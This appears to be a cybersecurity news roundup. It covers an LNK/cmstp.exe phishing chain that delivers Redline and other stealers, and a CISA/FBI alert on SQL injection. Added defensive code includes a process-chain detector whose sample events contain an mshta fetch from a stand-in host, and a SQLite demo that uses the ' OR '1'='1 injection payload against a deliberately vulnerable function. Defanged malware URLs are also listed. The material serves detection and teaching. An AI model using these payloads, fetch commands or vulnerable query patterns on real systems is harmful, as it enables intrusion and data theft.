The Cl0p gang moves its way into US government systems. It’ll take multiple showers to rinse out Shampoo malware. Hybrid war update. Arrests and indictments.
The US Government discloses exploitations of MOVEit vulnerabilities, and the Department of Energy is targeted by the Cl0p gang. CISA releases an updated advisory for Telerik vulnerabilities affecting Government servers. Shampoo malware emerges with multiple persistence mechanisms. How the IT Army of Ukraine can exemplify a cyber auxiliary. Russophone gamers are being targeted with ransomware. An alleged LockBit operator has been arrested. The FBI’s Deputy Assistant Director for cyber Cynthia Kaiser joins us with cybercriminal trends and recent successes. Our guest is Will Markow from Lightcast, speaking with Simone Petrella about data-driven strategic workforce decisions. And a federal grand jury indicts the alleged Discord Papers leaker.
Hackers Use Weaponized LNK Files to Exploit Microsoft Connection Manager Profile
Threat actors have shifted from malicious macros to malicious LNK files for initial access, a change driven by Microsoft’s 2022 announcement that macros would be disabled by default in Office documents downloaded from the internet or other untrusted sources.
The current attack vector abuses the Microsoft Connection Manager Profile Installer, cmstp.exe, as a proxy for executing malicious payloads.
This campaign was found to be similar to the Invicta stealer infection method, but the infection chain varies, which indicates that the threat actors have changed their TTPs (Tactics, Techniques, and Procedures).
In most cases, the LNK file that launches the remote VBScript infection is distributed via spam emails, disguised as a legitimate-looking attachment with an extension such as ZIP or ISO.
LNK Files to Exploit Microsoft Connection Manager Profile
After the victim downloads a ZIP file containing the LNK file, which is disguised as a PDF, opening the LNK initiates remote execution of a .hta file hosted on an attacker-controlled server.
Once the .hta file executes, it downloads a heavily obfuscated VBScript. When run, the VBScript de-obfuscates a PowerShell loader, which in turn activates a PowerShell downloader.
Malicious LNK file (Source: Cyble)
Infection Chain (Source: Cyble)
This PowerShell downloader fetches the malware files from two URLs:
hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
These files are then stored in the AppData\Roaming directory under their original names. They are one PDF and one EXE file (the Redline stealer). The PowerShell downloader uses cmstp.exe for a UAC (User Account Control) bypass.
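The infection chain above (LNK, then a remote .hta, then VBScript, then a PowerShell loader, and finally cmstp.exe as a proxy for the payload) leaves a recognisable parent/child process trail. The following is an added detection example, not code from the Cyble report or the article: it scores process-creation events against that chain. The event format (JSON lines with `image`, `parent_image` and `command_line` keys) and all sample events, including the `example.invalid` host, are constructed for this example; map your own Sysmon or EDR fields onto those keys.

```python
"""Added example (not from the Cyble report or the article): flag process-creation
events matching the LNK -> .hta -> VBScript -> PowerShell -> cmstp.exe chain.
The event schema and every sample event below are constructed for illustration."""
import json

# Script and HTML-application hosts that appear in the chain.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
# Living-off-the-land binaries the chain uses to proxy execution.
PROXY_BINARIES = {"cmstp.exe"}


def basename(path):
    """Return the lowercase file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event is suspicious (empty list = benign)."""
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent_image", ""))
    cmdline = ev.get("command_line", "").lower()
    reasons = []
    # Stage 1: a script host launched directly from the desktop shell with a
    # remote URL on its command line (the LNK pulling the remote .hta).
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and (
        "http://" in cmdline or "https://" in cmdline
    ):
        reasons.append("script host launched from explorer.exe with a remote URL")
    # Stage 2: PowerShell started by another script host (the VBScript stage
    # de-obfuscating and running the PowerShell loader).
    if image in {"powershell.exe", "pwsh.exe"} and parent in {"wscript.exe", "cscript.exe", "mshta.exe"}:
        reasons.append("PowerShell spawned by script host " + parent)
    # Stage 3: cmstp.exe spawned by a script host rather than by installer tooling.
    if image in PROXY_BINARIES and parent in SCRIPT_HOSTS:
        reasons.append(image + " spawned by script host " + parent)
    return reasons


def scan(lines):
    """Parse JSON-lines events; return [(event_id, reasons)] for every hit, in order."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["id"], reasons))
    return hits


# Constructed sample events: a benign editor launch, the three chain stages,
# and a cmstp.exe run from an installer that should not be flagged.
SAMPLE_EVENTS = [
    r'{"id": 1, "image": "C:\\Windows\\System32\\notepad.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe C:\\Users\\u\\notes.txt"}',
    r'{"id": 2, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "mshta.exe http://example.invalid/stage.hta"}',
    r'{"id": 3, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "command_line": "powershell.exe -File C:\\Users\\u\\AppData\\Roaming\\loader.ps1"}',
    r'{"id": 4, "image": "C:\\Windows\\System32\\cmstp.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "cmstp.exe <arguments omitted>"}',
    r'{"id": 5, "image": "C:\\Windows\\System32\\cmstp.exe", "parent_image": "C:\\Temp\\vpn_setup.exe", "command_line": "cmstp.exe corp_vpn.inf"}',
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```

Each stage is scored independently so a single hit still surfaces when only part of the chain is logged; correlating the three hits on one host within a short window raises confidence further.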
Weaponized LNK Files Uncovered
As per the report submitted to Cyber Security News, the payloads delivered by the weaponized LNK files were identified as Blank Grabber, Redline Stealer, and NetSupport RAT.
Blank Grabber is a Python-based open-source stealer that ships with a GUI builder, so stealer payloads can be generated easily. It also offers customization options such as a custom icon, UAC bypass, and persistence at startup.
Redline Stealer is sold on cybercrime forums and is one of the most prominent infostealers in circulation. It is used to gain unauthorized access to sensitive information such as passwords, login credentials, autofill data, and credit card details.
NetSupport RAT is a commercial remote-access tool used legitimately by administrators, but it is being misused by threat actors to gain unauthorized access.
Furthermore, Cyble researchers have published a complete report with detailed information about the obfuscation, the attack vector, YARA rules, and other details.
Linux version of Akira ransomware targets VMware ESXi servers
The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide. […]
CISA and the FBI released the Secure by Design Alert to address SQL injection vulnerabilities in software that affect thousands of organizations.
SQL injection (SQLi) vulnerabilities are a persistent class of defects in commercial software.
Even though SQLi vulnerabilities have been known and documented for a decade now, and workable mitigations are available, software manufacturers have continued to ship products with this flaw, endangering a large number of users.
Secure by Design refers to how manufacturers design and create products to prevent malicious cyber actors from exploiting flaws.
Incorporating this mitigation from the start, in the design phase and continuing through development, release, and updates, reduces the cybersecurity burden on customers and the risk to the public.
“SQL vulnerabilities (such as CWE-89) are still a prevalent class of vulnerability. CWE-89 is on top 25 lists for both the most dangerous and stubborn software weaknesses in 2023”, CISA and FBI said in the report.
Specifics Of The SQL Injection Vulnerabilities
An SQL injection vulnerability occurs when user input is inserted directly into a SQL command, enabling threat actors to run arbitrary queries.
The root cause of SQLi vulnerabilities is developers’ neglect of security best practices, which leads to user-supplied data being mixed with database query code.
A successful SQLi exploitation can have disastrous consequences since it compromises the availability, confidentiality, and integrity of a database and the data within it.
In particular, malicious cyber actors may be able to take sensitive data, and modify, remove, or render data in a database unavailable due to SQLi vulnerabilities.
How To Eliminate SQL Injection Vulnerabilities
To avoid this kind of vulnerability, developers should use prepared statements with parameterized queries, which keep SQL code separate from user-supplied data, while designing and developing software products.
Software developers should mandate the use of parameterized queries across all of their applications in order to eliminate SQLi vulnerabilities systematically.
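To make the difference concrete, the following added example (not part of the CISA/FBI alert or this article) puts a string-concatenated query beside its prepared-statement equivalent against an in-memory SQLite database. The `users` table, its two rows and the tautology payload are constructed for the example; the same pattern applies to any database driver that supports bound parameters.

```python
"""Added example (not from the CISA/FBI alert): CWE-89 string concatenation
next to a parameterized query, run against a constructed in-memory SQLite table."""
import sqlite3


def setup_db():
    """Create a throwaway database with two constructed user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn, username):
    """BAD: user input is spliced into the SQL text, so input can become code."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """GOOD: a prepared statement with a bound parameter; the driver treats the
    value strictly as data, so quotes and SQL keywords in it are never parsed."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed test input: a classic tautology that turns the WHERE clause into
# "username = '' OR '1'='1'" when concatenated.
PAYLOAD = "' OR '1'='1"


def demo():
    """Return (rows leaked by the vulnerable lookup, rows from the safe lookup)."""
    conn = setup_db()
    leaked = find_user_vulnerable(conn, PAYLOAD)
    safe = find_user_safe(conn, PAYLOAD)
    conn.close()
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable lookup returned", len(leaked), "rows:", leaked)
    print("parameterized lookup returned", len(safe), "rows:", safe)
```

A code review aimed at the alert's recommendation can grep for query text built with `+`, `%`, `.format` or f-strings and treat each hit as a candidate for conversion to the parameterized form above.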
“CISA and the FBI urge senior executives at technology manufacturers to mount a formal review of their code to determine its susceptibility to SQLi compromises and encourage all technology customers to ask their vendors whether they have conducted such a review”, reads the joint alert.
Three Essential Principles For Developing Software That Is Secure By Design
Take Ownership Of Customer Security Outcomes
It is recommended that software producers adopt the common practice of using prepared statements with parameterized queries in software development.
Senior executives at software producers must accept responsibility for their customers’ security, beginning with formal code reviews to assess vulnerabilities.
Embrace Radical Transparency And Accountability
Software makers ought to monitor the types of vulnerabilities linked to their products and notify customers about them through the CVE initiative. Manufacturers have to make sure that all of the information in their CVE records is accurate.
Build Organizational Structure And Leadership To Achieve These Goals
Leaders should make security a declared company objective, create the proper incentive programs, and make the necessary investments to support it.
Manufacturers are urged by CISA and the FBI to release their own secure by design roadmap as evidence that they are strategically reconsidering their role in ensuring the safety of their consumers, rather than just putting in place tactical safeguards.